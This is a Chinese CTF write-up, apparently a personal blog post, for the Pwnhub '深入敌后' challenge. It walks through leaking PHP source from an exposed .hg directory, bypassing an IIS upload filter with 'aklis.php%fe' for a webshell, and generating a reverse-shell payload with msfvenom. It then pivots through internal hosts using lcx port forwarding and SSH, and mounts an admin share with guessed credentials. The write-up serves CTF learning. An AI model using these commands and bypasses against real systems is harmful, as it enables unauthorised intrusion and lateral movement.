Posted Updated 7 minutes read (About 1110 words)0 visits

Pwnhub之深入敌后writeup

好艰难的一趟旅程

pwnhub1

网站看看没啥发现, 端口扫扫也没啥发现

然后用猪猪侠的dirfuzz 扫描路径, 可以扫到有file/.hg路径, 然后用https://github.com/kost/dvcs-ripper 可以搞到源码

pwnhub2

接下来就是代码审计一波

漏洞点在uploader.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
<?php
	session_start();
	 
	// Get the filename and make sure it is valid
	$filename = basename($_FILES['file']['name']);

	 
	// Get the username and make sure it is valid
	$username = $_SESSION['userName'];
	if (!preg_match('/^[\w_\-]+$/', $username) ){
		echo "Invalid username";
		header("Refresh: 2; url=files.php");
		exit;
	}
	 
	if(isset($_POST['submit'])){
		$filename =md5(uniqid(rand()));
		$filename = preg_replace("/[^\w]/i", "", $filename);
		$upfile = $_FILES['file']['name'];
		$upfile = str_replace(';',"",$upfile);
		$tempfile = $_FILES['file']['tmp_name'];
		$ext = trim(get_extension($upfile)); // null
		if(in_array($ext,array('php','php3','php5','php7','phtml'))){
			die('Warning ! File type error..');
		}
		if($ext == 'asp' or $ext == 'asa' or $ext == 'cer' or $ext == 'cdx' or $ext == 'aspx' or $ext == 'htaccess') $ext = 'file';

		$full_path = sprintf("./users_file_system/%s/%s.%s", $username, $filename,$ext);

	}


	
	if (move_uploaded_file($_FILES['file']['tmp_name'], $full_path) ){
		header("Location: files.php");
		exit;
	} else {
		header("Location: upload_failure.php");
		

		exit;
	}
 	function get_extension($file){
		return strtolower(substr($file, strrpos($file, '.')+1));
	}
?>

初看好像写的没问题, 但是之前随便看看站点的时候就发现了这是一个Windows server + IIS的站点

然后这个上传漏洞以前遇到过, 还写过wp

http://old.lazysheep.cc/2015/05/19/0x24/

然后通过Fuzz也可以bypass这个上传过滤, aklis.php%fe也可以成功上传php文件

pwnhub3

得到webshell以后, 用msf生成了个反弹shell的exe(aklis.exe)

1
$ msfvenom -p windows/shell_reverse_tcp LHOST=xxxx LPORT=6666 -f exe -o /tmp/reverse.exe

pwnhub4

找个内网的ip: 172.31.5.95, 通过xshell对该目标进行ssh连接, 用户是ubuntu

之后用的是dlive里的lcx.exe进行端口转发, 参考:

http://wps2015.org/drops/drops/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%E4%B8%AD%E8%BD%AC%E5%8F%91%E5%B7%A5%E5%85%B7%E6%80%BB%E7%BB%93.html

windows的命令:

1
C:\inetpub\wwwroot\file\users_file_system\dlive\> lcx.exe -slave xxx 10000 172.31.5.95 22

我的xxx机子的命令:

1
$ ./portmap -m 2 -p1 10000 -p2 12345

portmap是linux下的lcx, 下载地址:http://www.vuln.cn/2791

然后就是通过ssh进行连接了

1
2
$ ssh ubuntu@xxx -p12345
password: abc@elk

密码从提示里知道的:
pwnhub5

在根目录下发现了flag, 本以为做出来了, 然后得知是假的, 简直奔溃……

该ubuntu服务器, ubuntu用户可以sudo, 有root权限, 不过不能访问外面, 想装工具也不方便…

然后在/home/ubuntu/.bash_history里找到了又一个内网ip: 172.31.13.133

.bash_history里也可以发现, 172.31.13.133开了135, 139, 445三个端口

pwnhub6

然后就进行了一系列的找相关漏洞, 把相应端口转发出来用msf测试, 未果….

然后找到$IPC相关命令

在windows机子上使用命令:

1
2
3
4
5
6
7
8
9
C:\inetpub\wwwroot\file\users_file_system\aklis>net use \\172.31.13.133\ipc$ "" /user:""
net use \\172.31.13.133\ipc$ "" /user:""
The command completed successfully.

C:\inetpub\wwwroot\file\users_file_system\aklis>net view \\172.31.13.133
net view \\172.31.13.133
System error 5 has occurred.

Access is denied.

但是没用, 尝试登陆…..

1
2
3
C:\inetpub\wwwroot\file\users_file_system\aklis>net use \\172.31.13.133\ipc$ "abc@ELK" /user:"Administrator"
net use \\172.31.13.133\ipc$ "abc@ELK" /user:"Administrator"
The command completed successfully.

登陆成功…..

密码是怎么得到的?

根据提示:

1
2017.01.15 11:50:00administrator:啊,好烦啊,需要设置那么多密码,偷懒好了,妈蛋,windows为啥还有密码策略。

然后查了下windows的密码策略

1
2
3
4
5
6
7
长度至少为 6 个字元
包含下列四种字元中的三种:
英文大写字元 (A 到 Z)
英文小写字元 (a 到 z)
10 进位数字 (0 到 9)
非英文字母字元 (例如: !、$、#、%)
建立或变更密码时会強制执行复杂 性需求

然后一猜就猜到了…..

之后是

1
2
3
C:\inetpub\wwwroot\file\users_file_system\aklis>net use d: \\172.31.13.133\c$ "abc@ELK" /user:"Administrator"
net use d: \\172.31.13.133\c$ "abc@ELK" /user:"Administrator"
The command completed successfully.

然后是进入D:, 找flag, 但是没找到, 然后得知flag就是在该机子中, 然后搜了一波windows下的搜索文件命令:

1
2
3
4
D:\>for /r D: %i in (*flag*) do @echo %i
for /r D: %i in (*flag*) do @echo %i
D:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\flag.txt
D:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\flag.lnk

好了….找到flag了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
D:\>cd "Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5"
cd "Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5"

D:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5>dir
dir
 Volume in drive D has no label.
 Volume Serial Number is B2D4-D0F2

 Directory of D:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5

12/12/2016  02:26    <DIR>          .
12/12/2016  02:26    <DIR>          ..
12/01/2017  08:35                31 flag.txt
10/06/2009  21:14             7,169 Workflow.Targets
10/06/2009  21:14             8,680 Workflow.VisualBasic.Targets
               3 File(s)         15,880 bytes
               2 Dir(s)   2,673,094,656 bytes free

D:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5>type flag.txt
type flag.txt
pwnhub{flag:y0u f0und my h3art}

Pwnhub之深入敌后writeup

https://nobb.site/2017/01/17/0x2b/

Author

Hcamael

Posted on

2017-01-17

Updated on

2019-07-26

Licensed under

#

Like this article? Support the author with

Follow

Recents

Tags

CTF22
Crypto10
Driver4
GIT2
HardWare4
Hardware4
IoT2
Kernel1
Linux4
Pentest1
Python4
RE3
SQLi2
USB3
Web9
Windows1
android3
bin41
blockchain5
eBPF3
network4
old_blog1
php4
record1
research37
sb1
share1
shellcode1
tips3
v811
随笔1

Links

×